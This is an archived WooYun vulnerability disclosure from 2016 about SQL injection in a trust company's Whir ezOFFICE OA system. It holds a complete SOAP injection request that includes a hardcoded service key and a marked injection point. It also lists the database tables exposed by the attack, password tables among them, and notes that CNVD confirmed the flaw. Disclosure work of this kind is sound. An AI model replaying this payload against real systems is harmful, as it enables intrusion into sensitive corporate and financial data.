乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-05-29: 细节已通知厂商并且等待厂商处理中 2016-05-31: 厂商已经确认,细节仅向厂商公开 2016-06-10: 细节向核心白帽子及相关领域专家公开 2016-06-20: 细节向普通白帽子公开 2016-06-30: 细节向实习白帽子公开 2016-07-15: 细节向公众公开
国元信托oa:http://**.**.**.**:7001/defaultroot/login.jsp注入点:*号处
POST http://**.**.**.**:7001/defaultroot/xfservices/GeneralWeb HTTP/1.1Accept-Encoding: gzip,deflateContent-Type: text/xml;charset=UTF-8SOAPAction: ""Content-Length: 463Host: **.**.**.**:7001Proxy-Connection: Keep-AliveUser-Agent: Apache-HttpClient/4.1.1 (java 1.5)<soapenv:Envelope xmlns:soapenv="http://**.**.**.**/soap/envelope/" xmlns:gen="http://com.whir.service/GeneralWeb"> <soapenv:Header/> <soapenv:Body> <gen:OAManager> <gen:input><root><key>auth.key.whir2012</key><cmd>syncUserList</cmd><domain>1*--</domain></root></gen:input> </gen:OAManager> </soapenv:Body></soapenv:Envelope>
Database: EZOFFICE+--------------------------------+---------+| Table | Entries |+--------------------------------+---------+| SECURITY_LOG | 648684 || OA_INFORMATIONSTATISTICS | 632866 || OA_INFORMATIONBROWSER | 434800 || WF_DEALWITHLOG | 32484 || WF_PROCEEDTRANSITION | 26185 || WF_PROCEEDACTIVITY | 25161 || OA_INFORMATION | 23817 || WF_PROCEEDTR | 22593 || WF_WORK | 20605 || OA_INFORMATIONACCESSORY | 15978 || WF_DEALWITHCOMMENT | 13968 || WF_DEALWITH | 12238 || DOCUMENT_SIGNATURE | 11367 || OA_ALLATTACH | 9610 || SYS_EXPORT_SCHEMA_08 | 8288 || SYS_EXPORT_SCHEMA_06 | 8267 || SYS_EXPORT_SCHEMA_05 | 8256 || SYS_EXPORT_SCHEMA_04 | 8244 || SYS_EXPORT_SCHEMA_03 | 8234 || SYS_EXPORT_SCHEMA_01 | 8217 || ORG_TMPPASSWORD | 7176 || OA_MAIL_USER | 6937 || EZ_FLOW_ACTION_LOG | 6929 || EZ_BPMPOOL_PROCINST | 4689 || EZ_FLOW_HI_ACTINST | 4385 || WF_PROCEEDFLOW | 4287 || DOCUMENT | 3882 || DOCUMENT_FILE | 3762 || OA_MAILINTERIOR | 3539 || OA_ANSWERSHEETOPTION | 3054 || EZ_FLOW_HI_TASKINST | 2956 || OA_DISTRICT | 2476 || SYS_EXPORT_SCHEMA_07 | 2371 || WHIR$CITY | 2232 || WF_READWRITECONTROL | 2203 || EZ_FLOW_RE_COMMENT | 2102 || OA_INFORMATIONHISTORY | 2079 || WHIR$T3011 | 1950 || OA_INFORPERSONALSTAT | 1876 || EXPORT000002 | 1772 || OA_ANSWERSHEETCONTENT | 1558 || OA_INFORORGSTAT | 992 || ORG_SYNCRTX | 941 || EZ_FLOW_RU_VARIABLE | 847 || ORG_RIGHTSCOPE | 839 || WHIR$T3013 | 800 || OA_THEMEOPTION | 780 || OA_INFORHISTORYACCESSORY | 761 || EZ_FLOW_HI_PROCINST | 742 || OA_MAILACCESSORY | 728 || WHIR$T3023 | 627 || TELT | 515 || EZ_FORM_FIELD | 510 || OA_VOITUREAPPLY | 510 || OA_PASSWORD_HISTORY | 503 || EZ_FLOW_GE_BYTEARRAY | 471 || TFIELD | 400 || GOV_RECEIVEFILE | 393 || OA_PATCHINFO | 377 || WF_IMMOBILITYFIELD | 370 || WF_TRANSITIONRESTRICTION | 367 || ZL_USER_INFO | 281 || ORG_RIGHT | 269 || WF_TRANSITION | 249 || WF_ACTIVITY | 245 || ORG_EMPLOYEE | 216 || ORG_ORGANIZATION_USER | 214 || WHIR$COUNTRY | 210 || EZ_SECU_ERRORCLIENT | 205 || ORG_ROLE_RIGHT | 200 || OA_SYSTEM_REMIND | 188 || HR_RPT_INIT_FIELD | 183 || SECURITY_LOGOIN_ERROR | 182 || GOV_SENDDOCUMENTUPDATE | 179 || WHIR$T3010 | 155 || EZ_FLOW_DE_ACTIVITY | 144 || EZ_FLOW_RE_DEPLOYMENT | 135 || EZ_FLOW_RE_PROCDEF | 135 || EZ_SECU_PAGELIST | 124 || OA_INFORMATIONCHANNEL | 119 || OA_QUESTHEME | 119 || EMPLOYEE_20110217145223SCOPE | 118 || EMPLOYEE_20110217150839SCOPE | 118 || OA_ANSWERSHEET | 116 || HR_S_GZXM | 100 || GOV_CUSTOM_CHECKFIELD | 98 || BOOKMARKS | 94 || EZ_FLOW_RU_EXECUTION | 90 || GOV_CUSTOM_FIELD | 87 || WHIR$T3024 | 87 || OA_CUSTMENU | 81 || WHIR$T3015 | 80 || OA_PORTAL_PORTLET_SETTING | 76 || WHIR$T3025 | 75 || OA_PORTAL_PORTLET | 73 || OA_MENUSET | 68 || TSHOW | 67 || WF_GRAPH_UNIT | 59 || EZ_BPMPOOL_PROCESSPACKAGE | 56 || SECURITY_LOG_MODULE | 56 || WF_PACKAGE | 56 || ORG_USER_ROLE | 55 || EZ_BPMPOOL_PROCESS | 54 || GOV_DOCUMENTSENDFILE | 53 || OA_PERSONOA_USER_PRESS_RELATIO | 53 || OA_INFORMATIONCOMMENT | 51 || ORG_LOGINPAGESETTAB | 51 || TAREA | 50 || ORG_USER_GROUP | 46 || TPAGE | 46 || EZ_FORM_TABLE | 44 || WHIR$T3032 | 44 || EZ_FORM | 40 || OA_WORKLOG | 40 || WF_NEEDFLOWMODULE | 40 || OA_NETDISK_FILE | 39 || OA_OFFICALDICTION | 39 || WHIR$T3009 | 38 || EZ_BPMPOOL_PROCESS_STARTUSER | 37 || WF_IMMOBILITYFORM | 37 || WF_WORKFLOW_DESIGNER | 37 || TTABLE | 34 || WHIR$PROVINCE | 34 || OA_PORTAL_LAYOUT_PORTLET | 32 || EZ_FLOW_DE_DESIGFORM | 28 || EZ_FLOW_DE_DESIGNER | 28 || EZ_FLOW_RE_PACK_PDE | 28 || ORG_ORGANIZATION | 28 || TEMPLATE_BOOKMARKS | 28 || EZ_BPMPOOL_PROCESS_STARTORG | 27 || WF_DEALWITHCOMMENT_DRAFT | 27 || WF_WORKFLOWPROCESS | 27 || CUSTOMER_CENTER | 26 || OA_PERSONOA_PRESS | 26 || EZ_FLOW_RU_TASK | 25 || OA_INFORMATION_PRINT | 25 || EVO_WEIXIN_ORGMAP | 24 || OA_DUTY | 24 || OA_PORTAL_LAYOUT | 24 || WF_WORKFLOWWRITECONTROL | 24 || WF_OA_RELATEFIELD | 22 || OA_INFORMATION_DEPARTMENT_XML | 21 || EZ_FORM_PRINT | 20 || OA_EVENTATTENDER | 20 || SITE_RIGHT | 20 || WHIR$T3040 | 19 || OA_BOARDROOM_PERSONS | 17 || ORG_20110217150839 | 16 || ORG_ROLE | 16 || GOV_SENDDOCUMENTTOPICAL | 15 || WHIR$T3031 | 15 || MS_MODEL | 14 || OA_RELATIONMODULE | 14 || OA_PORTAL_TYPE | 13 || DOCUMENT_HISTORY | 12 || GOV_DOCUMENTUNIT | 12 || OA_PERSONAL_POSITIONS | 12 || TMODEL | 12 || EZ_BPMPOOL_RELATIONPROCESS | 11 || OA_EVENT | 11 || OA_GRAPHREPORT | 11 || OA_GRAPHREPORT_TYPE | 11 || OA_VOITURE | 11 || WHIR$T3026 | 11 || HR_S_INCOME_TAX | 9 || OA_BOARDROOM_EXECUTESTATUS | 9 || OA_EXT_TABLE | 9 || OA_MENU | 9 || OA_PORTAL_TEMPLATE | 9 || TAREATYPE | 9 || WF_OLDCOMMENTLOG | 9 || WHIR$T3028 | 9 || HR_S_RATIO_SETTING | 8 || OA_BDROOMAPPTYPE | 8 || OA_INFORMATIONSTATISTICSTYPE | 8 || ORG_GROUP | 8 || WF_RU_REMINDINFO | 8 || WHIR$T3020 | 8 || GOV_RECEIVEFILENUMSEQ | 7 || GOV_RECEIVEFILESEQ | 7 || OA_EMPLOYEE_STATUS | 7 || OA_EXT_SHOW | 7 || OA_PERSONONDUTY | 7 || OA_RELATIONOBJECT | 7 || OA_STATUS_DETAIL | 7 || TEMPLATE_FILE | 7 || WF_RELATIONPROCESS | 7 || WHIR$T3018 | 7 || GOV_SENDDOCUMENTNUM | 6 || GOV_SENDDOCUMENTWORD | 6 || OA_MATURITY_ALERT_SETTINGS | 6 || OA_QUESTIONNAIRE | 6 || ORG_EMPLOYEE_EDUSTORY | 6 || ORG_SIDELINE | 6 || EMPLOYEE_20110217145223ROLE | 5 || EMPLOYEE_20110217150839ROLE | 5 || EZ_FORM_MODULE | 5 || LDAPSET | 5 || OA_DEPARTMENTSTYLE | 5 || OA_INFORMATIONLUCENETEMP | 5 || OA_SYSDICT | 5 || SIGNATURE | 5 || SYS_CORP_SET_APP | 5 || SYS_EXPORT_SCHEMA_02 | 5 || WHIR$T3016 | 5 || WHIR$T3022 | 5 || WHIR$T3027 | 5 || EZ_BPMPOOL_COMMONPROCESS | 4 || HR_RPT_SHOW_FIELD | 4 || MS_INFOFLOW | 4 || OA_EXT_TYPE | 4 || OA_PORTAL_PORTLET_FILE | 4 || OA_TASK | 4 || OA_TASKEXEC | 4 || OA_TASKVIEW | 4 || TTYPE | 4 || EZ_FLOW_GE_PROPERTY | 3 || GJ_EMPCHANGETYPE | 3 || GOV_CUSTOM_DOCUMNET | 3 || OA_DOSSIER_GDSET | 3 || SECURITY_ONLINEUSER | 3 || UNION_TASKFROM | 3 || USER_ORG_SYN_ERRLOG | 3 || ZL_ORG_INFO | 3 || EMPLOYEE_20110217145223 | 2 || EMPLOYEE_20110217150839 | 2 || EZ_FLOW_RU_PROCDRAFT | 2 || HR_DEPT_KIND | 2 || HR_PERSON_TYPE | 2 || LDAPACCOUNTS | 2 || OA_BOARDROOM | 2 || OA_CARDEMPINFO | 2 || OA_CUSTOMDESKTOPLAYOUT | 2 || OA_FORUM | 2 || OA_FORUMCLASS | 2 || OA_NOTEPAPER | 2 || OA_PERSONALSTAT | 2 || OA_SYSTEM_USERMODULE | 2 || OA_TRAINCLASS | 2 || TLIMIT | 2 || TSEQ | 2 || VERSION_FILE | 2 || WEIBO_USER | 2 || WF_WORK_ACCESSORY | 2 || WHIR$T3030 | 2 || WHIR$T3041 | 2 || EMPLOYEE_20110217145223USER | 1 || EMPLOYEE_20110217150839USER | 1 || EZ_BPMPOOL_PROCESS_STARTGROUP | 1 || GJ_DRAWDEPT | 1 || GJ_GOODS | 1 || GJ_GOODSTYPE | 1 || GJ_PTDETAIL | 1 || GJ_PTMASTER | 1 || GJ_STOCK | 1 || GJ_STOCK_GOODSTYPE | 1 || GJ_SUPPLYUNIT | 1 || GOV_DOCUMENTFILETYPE | 1 || GOV_RECEIVEDOCUMENTBASEINFO | 1 || GOV_SENDDOCUMENTBASEINFO | 1 || GOV_SENDFILE_USER | 1 || HR_RPT_SOLUTION | 1 || HR_S_FFFS_SETTING | 1 || OA_BOARDROOM_MEETINGTIME | 1 || OA_BOARDROOMAPPLY | 1 || OA_BOOKS | 1 || OA_BOOKSTYPE | 1 || OA_DIARYCLASS | 1 || OA_INFORMATIONTAG | 1 || OA_LIBRARY | 1 || OA_MAIL_H_SET | 1 || OA_ORGWRAP | 1 || OA_PERSONSETUP | 1 || OA_PORTAL_MENU_SETTING | 1 || OA_RECORDTYPE | 1 || OA_SEQ | 1 || OA_SYS_MAILREMIND | 1 || OA_TASKHISTORY | 1 || OA_TASKREMIND | 1 || OA_TRAINRECORD | 1 || OA_UNITINFO | 1 || OA_VOITUREAUDITING | 1 || OA_VOITURETYPE | 1 || OA_WF_OVERDATE | 1 || OA_WF_WORKDATE | 1 || OA_WORKADDRESS_TYPE | 1 || OACONSOLE_MANAGER | 1 || ORG_20110217145223 | 1 || ORG_20110217145223USER | 1 || ORG_20110217150839USER | 1 || ORG_DOMAIN | 1 || ORG_GROUP_CLASS | 1 || ORG_MANAGER | 1 || ORG_ROLE_CLASS | 1 || SECURITY_DOG | 1 || SECURITY_IP | 1 || SITE_MANAGER | 1 || SYS_CORP_SET | 1 || WH_APPEND | 1 |+--------------------------------+---------+
登录后,可以看到内部邮件以及其他的集成系统,所以危害还是蛮大的
危害等级:高
漏洞Rank:10
确认时间:2016-05-31 17:45
CNVD确认并复现所述情况,已经转由CNCERT向银行业信息化主管部门通报,由其后续协调网站管理单位处置.
暂无